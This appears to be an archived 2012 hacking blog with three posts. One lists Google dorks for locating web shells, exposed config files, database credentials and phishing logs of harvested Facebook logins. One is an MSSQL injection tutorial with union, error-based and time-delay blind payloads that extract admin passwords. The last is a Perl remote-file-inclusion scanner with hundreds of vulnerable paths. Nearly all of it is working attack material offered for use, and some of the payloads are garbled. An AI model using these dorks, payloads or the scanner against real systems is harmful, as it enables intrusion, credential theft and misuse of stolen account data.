Ilyas Cyber4rt

Home » Archives for August 2012

TOP GOOGLE DORK

Posted by Yas Wednesday 22 August 2012 0 comments

Symlink dork.

Code:
inurl:/sym/root/ & intext:"Parent Directory"

~
c99shell dork.

Code:
inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

~
c99shell dork(2).

Code:
inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

~
WordPress MySQL details.

Code:
inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)

~
Databases username && passwords.

Code:
inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.com

~
Phish The Phisher (:
Full thread here: [TuT] Getting up to 40,000 Facebook Accounts.

Code:
filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

SILAKAN MENIKMaTI :D

mysql injection TUT

Posted by Yas Tuesday 21 August 2012 1 comment

Welcome to my complete MsSQL Injection Tutorial.
Today I'm going to show you 3 ways.
Union Attack
Convert Attack
Blind Injection (Time Delay)

Okay so lets start...

[~] MsSQL - Union Attack. [~]

So lets say our target is: http://www.crysan.edu/manager.asp?id=14

We can find the column count by order by clause.
This works just like the MySQL Union Based method.

http://www.crysan.edu/manager.asp?id=14 ORDER BY 1--

We get something like:
Quote:
ADODB.Recordset Error '800a0bcd '

Either BOF or EOF is True, or the current record has been deleted requested operation requires a current record.

/ manager.asp, line 10

Let's encrease 1 to 2, 2 to 3 etc...

http://www.crysan.edu/manager.asp?id=14 ORDER BY 2--
http://www.crysan.edu/manager.asp?id=14 ORDER BY 3--
http://www.crysan.edu/manager.asp?id=14 ORDER BY 4--
...
http://www.crysan.edu/manager.asp?id=14 ORDER BY 13--

...until we get an error like that:
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error '80040e14 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] The number of ORDER BY position 13 is outside the range of elements in the select list.

/ manager.asp, line 9

This means our column count is: 12.

If this is not working use string:
http://www.crysan.edu/manager.asp?id=-14' and 1=2 ORDER BY 13--

This should work :), if not you can try the other 2 methods.

Now we select every column to see with which one we can readout the details we want.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--

As we can see 2 , 12, 10 etc. can be used for our attack.
I will use 12.

Let's see if we can get the name from the current database.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,db_name()--

Now we can see the current database name where the number 12 was.
Lets say the database name of our example is: crysan_db

Lets read the tables from crysan_db.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables--

Now we will get the first table of the database.

Lets say its: tutorial_pictures.
Thats not the table we want to see.

So let's see whats the name of the next table.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in ('tutorial_pictures')--

Now we will see the next table: tutorial_category.
Mhm, still not the table we would like to see.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in ('tutorial_pictures','tutorial_category')--[/color]

Do this until you found the table you wanted.
If its blank, you reached the end.

Finally we got this: tutorial_admin_users.
Fine, lets go to the next step.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users'--

We will see the first column in the table.
Lets say its: id

So what to do as next ? Right !
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users' and column_name not in ('id')--

Now we can see the next column is: t_usr

Let's redo the last step to get the next column.
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name='tutorial_admin_users' and column_name not in ('t_usr')--

Result: t_pwd

Finally we got this.

Database: crysan_db
Table: tutorial_admin_users
Columns: id, t_usr, t_pwd

Lets get the admin details =)

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users--

Result: admin

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users--

Result: 5683

If we want to get the details from the next user:
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users where t_usr not in ('admin')--

[~] MsSQL - Convert Attack. [~]

This is my favorite way :3
Our target for this is as example: http://sub.crysan.gov/news.asp?game=1

Okay, lets get the database.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,db_name)--

We should get an error message like that:
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error '80040e07 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'intranet' to a column of data type int.

news.asp, line 9

Okay, we know now that the database name is: intranet
Lets get the tables.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables))--

Now the same game like on the union attack.
We got trough that syntax the first table from the database.
Its: apfel_ficker

Time for the next table.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables+where+table_name+not+in+('apfel_ficker')))--

The next table is: sperma_schleuder

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables+where+table_name+not+in+('apfel_ficker','sperma_schleuder')))--

We do this until we get what we want.
Lets say we found: lappen_user

Ofcourse we need now to get the columns.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name='lappen_user'))--

Its the same thing here like above.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name='lappen_user+and+column_name+not+in+('id')))--
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name='lappen_user+and+column_name+not+in+('id','username?')))--

Columns; ID, username, passwd

Now we only need to read the data out.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user))--
Now we see that the username is admin.
Lets get the password.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+passwd+from+lappen_user))--
Now we got the password.

If we want to get the details from the next user:
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user+where+?username+not+in+('admin')))--

[~] MsSQL - Blind (Time Delay). [~]

Okay this will be the last way I show you.
Why not normal blind ? Because this seems to work better.

Target: http://crysan.cat/wrd/nyan.asp?cat=155

If we do this:
http://crysan.cat/wrd/nyan.asp?cat=155; WAITFOR DELAY '00:00:05'--

The database takes 5 seconds to response.
Time to get the database :)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=1) WAITFOR DELAY '00:00:05'--
Directly we get an error.

1 stands for the char count, means if the database name is intra.
It haves 5 chars, so our syntax would look like:
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=5) WAITFOR DELAY '00:00:05'--

Just put the char higher until the site takes 5 seconds to response/load.
As example; If we try
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=24) WAITFOR DELAY '00:00:05'--

And the page loads 5 seconds, the database name is 24 chars long.
This is important to understand for the next steps.

It's time to get the name of the db.
We know that our db name is 5 chars long.

We are going to use ascii.
Here is an ascii to char list: http://pastebin.com/BfzH9EXt
You will need it for our next step.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>97) WAITFOR DELAY '00:00:05'-- - Loads directly.
(97 is the place where to enter the ascii, just change it to the ascii you want to test.)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>98) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>99) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

Now we know the first char from the database name is: c

Now we need to get the 2'nd char.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>111) WAITFOR DELAY '00:00:05'-- - Loads directly.
(As you cann see I changed the 1 to 2, means we want know to know the 2'nd char. Change to 3 for 3'nd char and and and...)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>112) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>113) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

We know now the 2'nd char is: q

Keep doing that until you have all 5 chars.
Lets just say the database is: intra.

Time to get the tables

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=120) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=121) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=122) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

The second char is: z
Do you got the point ? Yea ? Fine

Lets say the table is: admin

Now its time to ? Right !, drink a coffe and get the columns.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name='admin'),1,1)))=99) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name='admin'),1,1)))=100) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

I guess you know the rest ;).
Now the final part...

The Column we got from the step above is: usr_name

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),1,1))=97) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load

First char is: a

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=98) WAITFOR DELAY '00:00:05'-- - Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=99) WAITFOR DELAY '00:00:05'-- - Takes 5 seconds to load.

I think I don't need to continue here, I guess you understand it now.

Remote File Inclusion Scanner

Posted by Yas Thursday 9 August 2012 0 comments

#!/usr/bin/perl
#Scan a host for rfi vulnz
# by Crash_Overide, edited by: metoovet. Hack too :P
use HTTP::Request;
use LWP::UserAgent;
&inizio;
sub inizio{
print q(
###########################
Rfi vulnz scanner
by The[Boss]-korell@hotmail.it
###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=;
chomp($host);
print "Ok lets scan..\n";
$rfi1="admin/admin_styles.php?mode=";
$rfi2="surveys/survey.inc.php?path=";
$rfi3="index.php?body=";
$rfi4="classes/adodbt/sql.php?classes_dir=";
$rfi5="enc/content.php?Home_Path=";
$rfi6="classified_right.php?language_dir=";
$rfi7="sources/functions.php?CONFIG[main_path]=";
$rfi8="sources/template.php?CONFIG[main_path]=";
$rfi9="embed/day.php?path=";
$rfi10="includes/dbal.php?eqdkp_root_path=";
$rfi11="sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=";
$rfi12="includes/kb_constants.php?module_root_path=";
$rfi13="mcf.php?content=";
$rfi14="components/com_facileforms/facileforms.frame.php?ff_compath=";
$rfi15="skins/advanced/advanced1.php?pluginpath[0]=";
$rfi16="zipndownload.php?PP_PATH=";
$rfi17="administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=";
$rfi18="components/com_zoom/includes/database.php?mosConfig_absolute_path=";
$rfi19="main.php?sayfa=";
$rfi20="components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=";
$rfi21="addpost_newpoll.php?addpoll=preview&thispath=";
$rfi22="header.php?abspath=";
$rfi23="components/com_performs/performs.php?mosConfig_absolute_path=";
$rfi24="administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=";
$rfi25="impex/ImpExData.php?systempath=";
$rfi26="modules/vwar/admin/admin.php?vwar_root=";
$rfi27="coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=";
$rfi28="tools/send_reminders.php?includedir=";
$rfi29="skin/zero_vote/error.php?dir=";
$rfi30="modules/TotalCalendar/about.php?inc_dir=";
$rfi31="login.php?dir=";
$rfi32="xxxs.php?BBCodeFile=";
$rfi33="index.php?pageurl=";
$rfi34="templates/headline_temp.php?nst_inc=";
$rfi35="index.php?var=";
$rfi36="index.php?pagina=";
$rfi37="index.php?go=";
$rfi38="index.php?site=";
$rfi39="phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=";
$rfi40="administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=";
$rfi41="index.php?id=";
$rfi42="index1.php?=";
$rfi43="main.php?id=";
$rfi44="content.php?page=";
$rfi45="admin.php?page=";
$rfi46="lib/gore.php?libpath=";
$rfi47="SQuery/lib/gore.php?libpath=";
$rfi48="index2.php?p=";
$rfi49="index1.php?go=";
$rfi50="news_detail.php?file=";
$rfi51="old_reports.php?file=";
$rfi52="index.php?x=";
$rfi53="index.php?nic=";
$rfi54="homepage.php?sel=";
$rfi55="index.php?sel=";
$rfi56="main.php?x=";
$rfi57="components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=";
$rfi58="index2.php?x=";
$rfi59="main.php?pagina=";
$rfi60="test.php?page=";
$rfi61="components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=";
$rfi62="akocomments.php?mosConfig_absolute_path=";
$rfi63="index.php?page=";
$rfi64="*.php?page=";
$rfi65="index.php?oldal=";
$rfi66="index.php?lang=gr&file=";
$rfi67="index.php?pag=";
$rfi68="index.php?incl=";
$rfi69="avatar.php?page=";
$rfi70="index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=";
$rfi71="index.php?p=";
$rfi72="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi73="index.php?mode=";
$rfi74="index.php?stranica=";
$rfi75="index.php?sub=";
$rfi76="index.php?t=";
$rfi77="index.php?r=";
$rfi78="index.php?menu=";
$rfi79="solpot.html?body=";
$rfi80="port.php?content=";
$rfi81="index0.php?show=";
$rfi82="index.php?topic=";
$rfi83="index.php?u=";
$rfi84="administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=";
$rfi85="administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=";
$rfi86="modules/My_eGallery/index.php?basepath=";
$rfi87="index.php?loc=";
$rfi88="myevent.php?myevent_path=";
$rfi89="administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=";
$rfi90="includes/functions.php?phpbb_root_path=";
$rfi91="m2f/m2f_phpbb204.php?m2f_root_path=";
$rfi92="show.php?path=";
$rfi93="administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=";
$rfi94="index.php?template=";
$rfi95="search.php?cutepath=";
$rfi96="show_news.php?cutepath=";
$rfi97="page.php?doc=";
$rfi98="administrator/components/com_webring/admin.webring.docs.php?component_dir=";
$rfi99="administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=";
$rfi100="help.php?css_path=";
$rfi101="components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
$rfi102="big.php?pathtotemplate=";
$rfi103="includes/search.php?GlobalSettings[templatesDirectory]=";
$rfi104="interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=";
$rfi105="functions.php?include_path=";
$rfi106="includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=";
$rfi107="class.mysql.php?path_to_bt_dir=";
$rfi108="include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi109="squirrelcart/cart_content.php?cart_isp_root=";
$rfi110="index2.php?to=";
$rfi111="index.php?load=";
$rfi112="home.php?pagina=";
$rfi113="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi114="modules/Forums/admin/admin_styles.php?phpbb_root_path=";
$rfi115="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi116="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi117="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi118="include/write.php?dir=";
$rfi119="db.php?path_local=";
$rfi120="index.php?url=";
$rfi121="index.php?p=";
$rfi122="index.php?openfile=";
$rfi123="index.php?file=";
$rfi124="index.php?content=";
$rfi125="index.php?side=";
$rfi126="index.php?kobr=";
$rfi127="index.php?doc=";
$rfi128="index.php?l=";
$rfi129="index.php?a=";
$rfi130="index.php?principal=";
$rfi131="index.php?show=";
$rfi132="index.php?opcao=";
$rfi133="index.php?conteudo=";
$rfi134="index.php?meio=";
$rfi135="index.php?inc=";
$rfi136="index.php?c=";
$rfi137="index.php?rage=";
$rfi138="index.php?arquivo=";
$rfi139="components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=";
$rfi140="index.php?place=";
$rfi141="index.php?dsp=";
$rfi142="index.php?dept=";
$rfi143="index.php?lg=";
$rfi144="index.php?inhalt=";
$rfi145="index.php?ort=";
$rfi146="index.php?pilih=";
$rfi147="principal.php?conteudo=";
$rfi148="main.php?site=";
$rfi149="template.php?pagina=";
$rfi150="contenido.php?sec=";
$rfi151="index_principal.php?pagina=";
$rfi152="template.php?name=";
$rfi153="forum.php?act=";
$rfi154="home.php?action=";
$rfi155="noticias.php?arq=";
$rfi156="main.php?page=";
$rfi157="default.php?page=";
$rfi158="index.php?cont=";
$rfi159="index.php?configFile=";
$rfi160="index.php?meio.php=";
$rfi161="index.php?include=";
$rfi162="index.php?open=";
$rfi163="index.php?visualizar=";
$rfi164="index.php?cat=";
$rfi165="index.php?action=";
$rfi166="index.php?do=";
$rfi167="index2.php?content=";
$rfi168="index.phpmain.php?x=";
$rfi169="index.php?link=";
$rfi170="index.php?canal=";
$rfi171="index.php?screen=";
$rfi172="index.php?langc=";
$rfi173="services.php?page=";
$rfi174="htmltonuke.php?filnavn=";
$rfi175="ihm.php?p=";
$rfi176="folder.php?id=";
$rfi177="index.php?Load=";
$rfi178="index.php?Language=";
$rfi179="hall.php?file=";
$rfi180="hall.php?page=";
$rfi181="template.php?goto=";
$rfi182="video.php?content=";
$rfi183="pages.php?page=";
$rfi184="print.php?page=";
$rfi185="show.php?page=";
$rfi186="view.php?page=";
$rfi187="media.php?page=";
$rfi188="index1.php?choix=";
$rfi189="index1.php?menu=";
$rfi190="index2.php?showpage=";
$rfi191="index2.php?ascii_seite=";
$rfi192="index2.php?DoAction=";
$rfi193="index2.php?ID=";
$rfi194="index2.php?url_page=";
$rfi195="index1.php?dat=";
$rfi196="index1.php?site=";
$rfi197="home.php?content=";
$rfi198="main.php?link=";
$rfi199="home.php?x=";
$rfi200="index1.php?x=";
$rfi201="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi202="modules/agendax/addevent.inc.php?agendax_path=";
$rfi203="include/main.php?config[search_disp]=true&include_dir=";
$rfi204="contrib/yabbse/poc.php?poc_root_path=";
$rfi205="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi206="photoalb/lib/static/header.php?set_menu=";
$rfi207="squito/photolist.inc.php?photoroot=";
$rfi208="bz/squito/photolist.inc.php?photoroot=";
$rfi209="ppa/inc/functions.inc.php?config[ppa_root_path]=";
$rfi210="spid/lang/lang.php?lang_path=";
$rfi211="classes.php?LOCAL_PATH=";
$rfi212="al_initialize.php?alpath=";
$rfi213="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi214="index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=";
$rfi215="extensions/moblog/moblog_lib.php?basedir=";
$rfi216="app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=";
$rfi217="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi218="components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=";
$rfi219="components/com_smf/smf.php?mosConfig_absolute_path=";
$rfi220="components/com_cpg/cpg.php?mosConfig_absolute_path=";
$rfi221="administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=";
$rfi222="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi223="inc/cmses/aedating4CMS.php?dir[inc]=";
$rfi224="components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
$rfi225="jscript.php?my_ms[root]=";
$rfi226="popup_window.php?site_isp_root=";
$rfi227="yabbse/Sources/Packages.php?sourcedir=";
$rfi228="includes/functions_portal.php?phpbb_root_path=";
$rfi229="includes/header.php?systempath=";
$rfi230="Gallery/displayCategory.php?basepath=";
$rfi231="index.inc.php?PATH_Includes=";
$rfi232="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi233="include/db.php?GLOBALS[rootdp]=";
$rfi234="ashnews.php?pathtoashnews=";
$rfi235="ashheadlines.php?pathtoashnews=";
$rfi236="demo/includes/init.php?user_inc=";
$rfi237="jaf/index.php?show=";
$rfi238="inc/shows.inc.php?cutepath=";
$rfi239="poll/admin/common.inc.php?base_path=";
$rfi240="pollvote/pollvote.php?pollname=";
$rfi241="sources/post.php?fil_config=";
$rfi242="bb_lib/checkdb.inc.php?libpach=";
$rfi243="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi244="index.php?from_market=Y&pageurl=";
$rfi245="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi246="pivot/modules/module_db.php?pivot_path=";
$rfi247="derniers_commentaires.php?rep=";
$rfi248="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi249="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi250="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi251="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi252="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi253="myPHPCalendar/admin.php?cal_dir=";
$rfi254="agendax/addevent.inc.php?agendax_path=";
$rfi255="index1.php?p=";
$rfi256="include/new-visitor.inc.php?lvc_include_dir=";
$rfi257="shoutbox/expanded.php?conf=";
$rfi258="library/editor/editor.php?root=";
$rfi259="library/lib.php?root=";
$rfi260="e107/e107_handlers/secure_img_render.php?p=";
$rfi261="zentrack/index.php?configFile=";
$rfi262="becommunity/community/index.php?pageurl=";
$rfi263="GradeMap/index.php?page=";
$rfi264="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi265="calendar/calendar.php?serverPath=";
$rfi266="calendar/functions/popup.php?serverPath=";
$rfi267="calendar/events/header.inc.php?serverPath=";
$rfi268="calendar/events/datePicker.php?serverPath=";
$rfi269="calendar/setup/setupSQL.php?serverPath=";
$rfi270="calendar/setup/header.inc.php?serverPath=";
$rfi271="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi272="inc/header.php/step_one.php?server_inc=";
$rfi273="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi274="inc/pipe.php?HCL_path=";
$rfi275="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi276="coppercop/theme.php?THEME_DIR=";
$rfi277="dotproject/modules/projects/addedit.php?root_dir=";
$rfi278="dotproject/modules/projects/view.php?root_dir=";
$rfi279="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi280="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi281="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi282="My_eGallery/public/displayCategory.php?basepath=";
$rfi283="index.php?include=";
$rfi284="index.php?x=";
$rfi285="index.php?content=";
$rfi286="index.php?cat=";
$rfi287="index2.php?x=";
$rfi288="GradeMap/index.php?page=";
$rfi289="path_of_cpcommerce/_functions.php?prefix=";
$rfi290="contacts.php?cal_dir=";
$rfi291="convert-date.php?cal_dir=";
$rfi292="album_portal.php?phpbb_root_path=";
$rfi293="mainfile.php?MAIN_PATH=";
$rfi294="dotproject/modules/files/index_table.php?root_dir=";
$rfi295="html/affich.php?base=";
$rfi296="gallery/init.php?HTTP_POST_VARS=";
$rfi297="pm/lib.inc.php?pm_path=";
$rfi298="ideabox/include.php?gorumDir=";
$rfi299="index2.php?includes_dir=";
$rfi300="forums/toplist.php?phpbb_root_path=";
$rfi301="forum/toplist.php?phpbb_root_path=";
$rfi302="admin/config_settings.tpl.php?include_path=";
$rfi303="include/common.php?include_path=";
$rfi304="event/index.php?page=";
$rfi305="forum/index.php?includeFooter=";
$rfi306="forums/index.php?includeFooter=";
$rfi307="forum/bb_admin.php?includeFooter=";
$rfi308="forums/bb_admin.php?includeFooter=";
$rfi309="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi310="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi311="blend_data/blend_common.php?phpbb_root_path=";
$rfi312="master.php?root_path=";
$rfi313="forum/includes/kb_constants.php?module_root_path=";
$rfi314="forums/includes/kb_constants.php?module_root_path=";
$rfi315="agenda.php3?rooxxxenda=";
$rfi316="agenda2.php3?rooxxxenda=";
$rfi317="sources/lostpw.php?CONFIG[path]=";
$rfi318="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi319="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi320="sources/join.php?CONFIG[path]=";
$rfi321="topsites/sources/join.php?CONFIG[path]=";
$rfi322="toplist/sources/join.php?CONFIG[path]=";
$rfi323="topsite/sources/join.php?CONFIG[path]=";
$rfi324="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi325="extras/poll/poll.php?file_newsportal=";
$rfi326="index.php?site_path=";
$rfi327="mail/index.php?site_path=";
$rfi328="fclick/show.php?path=";
$rfi329="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi330="eshow.php?Config_rootdir=";
$rfi331="auction/auction_common.php?phpbb_root_path=";
$rfi332="index.php?inc_dir=";
$rfi333="calendar/index.php?inc_dir=";
$rfi334="modules/TotalCalendar/index.php?inc_dir=";
$rfi335="modules/calendar/index.php?inc_dir=";
$rfi336="calendar/embed/day.php?path=";
$rfi337="ACalendar/embed/day.php?path=";
$rfi338="calendar/add_event.php?inc_dir=";
$rfi339="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi340="claroline/auth/ldap/authldap.php?includePath=";
$rfi341="docebo/modules/credits/help.php?lang=";
$rfi342="modules/credits/help.php?lang=";
$rfi343="config.php?returnpath=";
$rfi344="editsite.php?returnpath=";
$rfi345="in.php?returnpath=";
$rfi346="addsite.php?returnpath=";
$rfi347="includes/pafiledb_constants.php?module_root_path=";
$rfi348="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi349="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi350="auth/auth.php?phpbb_root_path=";
$rfi351="auth/auth_phpbb/phpbb_root_path=";
$rfi352="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi353="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi354="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi355="phpdig/includes/config.php?relative_script_path=";
$rfi356="includes/phpdig/includes/config.php?relative_script_path=";
$rfi357="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi358="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi359="path/include/SQuery/gameSpy2.php?libpath=";
$rfi360="include/global.php?GLOBALS[includeBit]=";
$rfi361="topsites/config.php?returnpath=";
$rfi362="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi363="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi364="forum/addpost_newpoll.php?thispath=";
$rfi365="forums/addpost_newpoll.php?thispath=";
$rfi366="ubbthreads/ubbt.inc.php?thispath=";
$rfi367="forums/ubbt.inc.php?thispath=";
$rfi368="forum/ubbt.inc.php?thispath=";
$rfi369="forum/admin/addentry.php?phpbb_root_path=";
$rfi370="admin/addentry.php?phpbb_root_path=";
$rfi371="index.php?f=";
$rfi372="index.php?act=";
$rfi373="ipchat.php?root_path=";
$rfi374="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi375="stats.php?dir[func]=dir[base]=";
$rfi376="ladder/stats.php?dir[base]=";
$rfi377="ladders/stats.php?dir[base]=";
$rfi378="sphider/admin/configset.php?settings_dir=";
$rfi379="admin/configset.php?settings_dir=";
$rfi380="vwar/admin/admin.php?vwar_root=";
$rfi381="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi382="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
